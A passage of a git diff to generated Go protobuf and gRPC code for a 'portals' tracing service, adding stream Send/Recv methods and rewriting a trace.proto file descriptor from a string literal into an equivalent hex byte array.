OpenPortalResponse] +func (x *portalOpenPortalServer) Send(m *OpenPortalResponse) error { + return x.ServerStream.SendMsg(m) +} + +func (x *portalOpenPortalServer) Recv() (*OpenPortalRequest, error) { + m := new(OpenPortalRequest) + if err := x.ServerStream.RecvMsg(m); err != nil { + return nil, err + } + return m, nil +} // Portal_ServiceDesc is the grpc.ServiceDesc for Portal service. // It's only intended for direct use with grpc.RegisterService, diff --git a/tavern/portals/tracepb/trace.pb.go b/tavern/portals/tracepb/trace.pb.go index 522dc3f82..d16c158d5 100644 --- a/tavern/portals/tracepb/trace.pb.go +++ b/tavern/portals/tracepb/trace.pb.go @@ -1,7 +1,7 @@ // Code generated by protoc-gen-go. DO NOT EDIT. // versions: -// protoc-gen-go v1.36.11 -// protoc v4.25.1 +// protoc-gen-go v1.36.5 +// protoc v3.21.12 // source: trace.proto package tracepb @@ -222,32 +222,57 @@ func (x *TraceData) GetEvents() []*TraceEvent { var File_trace_proto protoreflect.FileDescriptor -const file_trace_proto_rawDesc = "" + - "\n" + - "\vtrace.proto\x12\x05trace\"b\n" + - "\n" + - "TraceEvent\x12)\n" + - "\x04kind\x18\x01 \x01(\x0e2\x15.trace.TraceEventKindR\x04kind\x12)\n" + - "\x10timestamp_micros\x18\x02 \x01(\x03R\x0ftimestampMicros\"s\n" + - "\tTraceData\x12!\n" + - "\fstart_micros\x18\x01 \x01(\x03R\vstartMicros\x12\x18\n" + - "\apadding\x18\x02 \x01(\fR\apadding\x12)\n" + - "\x06events\x18\x03 \x03(\v2\x11.trace.TraceEventR\x06events*\xec\x03\n" + - "\x0eTraceEventKind\x12 \n" + - "\x1cTRACE_EVENT_KIND_UNSPECIFIED\x10\x00\x12\x1e\n" + - "\x1aTRACE_EVENT_KIND_USER_SEND\x10\x01\x12%\n" + - "!TRACE_EVENT_KIND_SERVER_USER_RECV\x10\x02\x12$\n" + - " TRACE_EVENT_KIND_SERVER_USER_PUB\x10\x03\x12%\n" + - "!TRACE_EVENT_KIND_SERVER_AGENT_SUB\x10\x04\x12&\n" + - "\"TRACE_EVENT_KIND_SERVER_AGENT_SEND\x10\x05\x12\x1f\n" + - "\x1bTRACE_EVENT_KIND_AGENT_RECV\x10\x06\x12\x1f\n" + - "\x1bTRACE_EVENT_KIND_AGENT_SEND\x10\a\x12&\n" + - "\"TRACE_EVENT_KIND_SERVER_AGENT_RECV\x10\b\x12%\n" + - "!TRACE_EVENT_KIND_SERVER_AGENT_PUB\x10\t\x12$\n" + - " TRACE_EVENT_KIND_SERVER_USER_SUB\x10\n" + - "\x12%\n" + - "!TRACE_EVENT_KIND_SERVER_USER_SEND\x10\v\x12\x1e\n" + - "\x1aTRACE_EVENT_KIND_USER_RECV\x10\fB\"Z realm.pub/tavern/portals/tracepbb\x06proto3" +var file_trace_proto_rawDesc = string([]byte{ + 0x0a, 0x0b, 0x74, 0x72, 0x61, 0x63, 0x65, 0x2e, 0x70, 0x72, 0x6f, 0x74, 0x6f, 0x12, 0x05, 0x74, + 0x72, 0x61, 0x63, 0x65, 0x22, 0x62, 0x0a, 0x0a, 0x54, 0x72, 0x61, 0x63, 0x65, 0x45, 0x76, 0x65, + 0x6e, 0x74, 0x12, 0x29, 0x0a, 0x04, 0x6b, 0x69, 0x6e, 0x64, 0x18, 0x01, 0x20, 0x01, 0x28, 0x0e, + 0x32, 0x15, 0x2e, 0x74, 0x72, 0x61, 0x63, 0x65, 0x2e, 0x54, 0x72, 0x61, 0x63, 0x65, 0x45, 0x76, + 0x65, 0x6e, 0x74, 0x4b, 0x69, 0x6e, 0x64, 0x52, 0x04, 0x6b, 0x69, 0x6e, 0x64, 0x12, 0x29, 0x0a, + 0x10, 0x74, 0x69, 0x6d, 0x65, 0x73, 0x74, 0x61, 0x6d, 0x70, 0x5f, 0x6d, 0x69, 0x63, 0x72, 0x6f, + 0x73, 0x18, 0x02, 0x20, 0x01, 0x28, 0x03, 0x52, 0x0f, 0x74, 0x69, 0x6d, 0x65, 0x73, 0x74, 0x61, + 0x6d, 0x70, 0x4d, 0x69, 0x63, 0x72, 0x6f, 0x73, 0x22, 0x73, 0x0a, 0x09, 0x54, 0x72, 0x61, 0x63, + 0x65, 0x44, 0x61, 0x74, 0x61, 0x12, 0x21, 0x0a, 0x0c, 0x73, 0x74, 0x61, 0x72, 0x74, 0x5f, 0x6d, + 0x69, 0x63, 0x72, 0x6f, 0x73, 0x18, 0x01, 0x20, 0x01, 0x28, 0x03, 0x52, 0x0b, 0x73, 0x74, 0x61, + 0x72, 0x74, 0x4d, 0x69, 0x63, 0x72, 0x6f, 0x73, 0x12, 0x18, 0x0a, 0x07, 0x70, 0x61, 0x64, 0x64, + 0x69, 0x6e, 0x67, 0x18, 0x02, 0x20, 0x01, 0x28, 0x0c, 0x52, 0x07, 0x70, 0x61, 0x64, 0x64, 0x69, + 0x6e, 0x67, 0x12, 0x29, 0x0a, 0x06, 0x65, 0x76, 0x65, 0x6e, 0x74, 0x73, 0x18, 0x03, 0x20, 0x03, + 0x28, 0x0b, 0x32, 0x11, 0x2e, 0x74, 0x72, 0x61, 0x63, 0x65, 0x2e, 0x54, 0x72, 0x61, 0x63, 0x65, + 0x45, 0x76, 0x65, 0x6e, 0x74, 0x52, 0x06, 0x65, 0x76, 0x65, 0x6e, 0x74, 0x73, 0x2a, 0xec, 0x03, + 0x0a, 0x0e, 0x54, 0x72, 0x61, 0x63, 0x65, 0x45, 0x76, 0x65, 0x6e, 0x74, 0x4b, 0x69, 0x6e, 0x64, + 0x12, 0x20, 0x0a, 0x1c, 0x54, 0x52, 0x41, 0x43, 0x45, 0x5f, 0x45, 0x56, 0x45, 0x4e, 0x54, 0x5f, + 0x4b, 0x49, 0x4e, 0x44, 0x5f, 0x55, 0x4e, 0x53, 0x50, 0x45, 0x43, 0x49, 0x46, 0x49, 0x45, 0x44, + 0x10, 0x00, 0x12, 0x1e, 0x0a, 0x1a, 0x54, 0x52, 0x41, 0x43, 0x45, 0x5f, 0x45, 0x56, 0x45, 0x4e, + 0x54, 0x5f, 0x4b, 0x49, 0x4e, 0x44, 0x5f, 0x55, 0x53, 0x45, 0x52, 0x5f, 0x53, 0x45, 0x4e, 0x44, + 0x10, 0x01, 0x12, 0x25, 0x0a, 0x21, 0x54, 0x52, 0x41, 0x43, 0x45, 0x5f, 0x45, 0x56, 0x45, 0x4e, + 0x54, 0x5f, 0x4b, 0x49, 0x4e, 0x44, 0x5f, 0x53, 0x45, 0x52, 0x56, 0x45, 0x52, 0x5f, 0x55, 0x53, + 0x45, 0x52, 0x5f, 0x52, 0x45, 0x43, 0x56, 0x10, 0x02, 0x12, 0x24, 0x0a, 0x20, 0x54, 0x52, 0x41, + 0x43, 0x45, 0x5f, 0x45, 0x56, 0x45, 0x4e, 0x54, 0x5f, 0x4b, 0x49, 0x4e, 0x44, 0x5f, 0x53, 0x45, + 0x52, 0x56, 0x45, 0x52, 0x5f, 0x55, 0x53, 0x45, 0x52, 0x5f, 0x50, 0x55, 0x42, 0x10, 0x03, 0x12, + 0x25, 0x0a, 0x21, 0x54, 0x52, 0x41, 0x43, 0x45, 0x5f, 0x45, 0x56, 0x45, 0x4e, 0x54, 0x5f, 0x4b, + 0x49, 0x4e, 0x44, 0x5f, 0x53, 0x45, 0x52, 0x56, 0x45, 0x52, 0x5f, 0x41, 0x47, 0x45, 0x4e, 0x54, + 0x5f, 0x53, 0x55, 0x42, 0x10, 0x04, 0x12, 0x26, 0x0a, 0x22, 0x54, 0x52, 0x41, 0x43, 0x45, 0x5f, + 0x45, 0x56, 0x45, 0x4e, 0x54, 0x5f, 0x4b, 0x49, 0x4e, 0x44, 0x5f, 0x53, 0x45, 0x52, 0x56, 0x45, + 0x52, 0x5f, 0x41, 0x47, 0x45, 0x4e, 0x54, 0x5f, 0x53, 0x45, 0x4e, 0x44, 0x10, 0x05, 0x12, 0x1f, + 0x0a, 0x1b, 0x54, 0x52, 0x41, 0x43, 0x45, 0x5f, 0x45, 0x56, 0x45, 0x4e, 0x54, 0x5f, 0x4b, 0x49, + 0x4e, 0x44, 0x5f, 0x41, 0x47, 0x45, 0x4e, 0x54, 0x5f, 0x52, 0x45, 0x43, 0x56, 0x10, 0x06, 0x12, + 0x1f, 0x0a, 0x1b, 0x54, 0x52, 0x41, 0x43, 0x45, 0x5f, 0x45, 0x56, 0x45, 0x4e, 0x54, 0x5f, 0x4b, + 0x49, 0x4e, 0x44, 0x5f, 0x41, 0x47, 0x45, 0x4e, 0x54, 0x5f, 0x53, 0x45, 0x4e, 0x44, 0x10, 0x07, + 0x12, 0x26, 0x0a, 0x22, 0x54, 0x52, 0x41, 0x43, 0x45, 0x5f, 0x45, 0x56, 0x45, 0x4e, 0x54, 0x5f, + 0x4b, 0x49, 0x4e, 0x44, 0x5f, 0x53, 0x45, 0x52, 0x56, 0x45, 0x52, 0x5f, 0x41, 0x47, 0x45, 0x4e, + 0x54, 0x5f, 0x52, 0x45, 0x43, 0x56, 0x10, 0x08, 0x12, 0x25, 0x0a, 0x21, 0x54, 0x52, 0x41, 0x43, + 0x45, 0x5f, 0x45, 0x56, 0x45, 0x4e, 0x54, 0x5f, 0x4b, 0x49, 0x4e, 0x44, 0x5f, 0x53, 0x45, 0x52, + 0x56, 0x45, 0x52, 0x5f, 0x41, 0x47, 0x45, 0x4e, 0x54, 0x5f, 0x50, 0x55, 0x42, 0x10, 0x09, 0x12, + 0x24, 0x0a, 0x20, 0x54, 0x52, 0x41, 0x43, 0x45, 0x5f, 0x45, 0x56, 0x45, 0x4e, 0x54, 0x5f, 0x4b, + 0x49, 0x4e, 0x44, 0x5f, 0x53, 0x45, 0x52, 0x56, 0x45, 0x52, 0x5f, 0x55, 0x53, 0x45, 0x52, 0x5f, + 0x53, 0x55, 0x42, 0x10, 0x0a, 0x12, 0x25, 0x0a, 0x21, 0x54, 0x52, 0x41, 0x43, 0x45, 0x5f, 0x45, + 0x56, 0x45, 0x4e, 0x54, 0x5f, 0x4b, 0x49, 0x4e, 0x44, 0x5f, 0x53, 0x45, 0x52, 0x56, 0x45, 0x52, + 0x5f, 0x55, 0x53, 0x45, 0x52, 0x5f, 0x53, 0x45, 0x4e, 0x44, 0x10, 0x0b, 0x12, 0x1e, 0x0a, 0x1a, + 0x54, 0x52, 0x41, 0x43, 0x45, 0x5f, 0x45, 0x56, 0x45, 0x4e, 0x54, 0x5f, 0x4b, 0x49, 0x4e, 0x44, + 0x5f, 0x55, 0x53, 0x45, 0x52, 0x5f, 0x52, 0x45, 0x43, 0x56, 0x10, 0x0c, 0x42, 0x22, 0x5a, 0x20, + 0x72, 0x65, 0x61, 0x6c, 0x6d, 0x2e, 0x70, 0x75, 0x62, 0x2f, 0x74, 0x61, 0x76, 0x65, 0x72, 0x6e, + 0x2f, 0x70, 0x6f, 0x72, 0x74, 0x61, 0x6c, 0x73, 0x2f, 0x74, 0x72, 0x61, 0x63, 0x65, 0x70, 0x62, + 0x62, 0x06, 0x70, 0x72, 0x6f, 0x74, 0x6f, 0x33, +}) var ( file_trace_proto_rawDescOnce sync.Once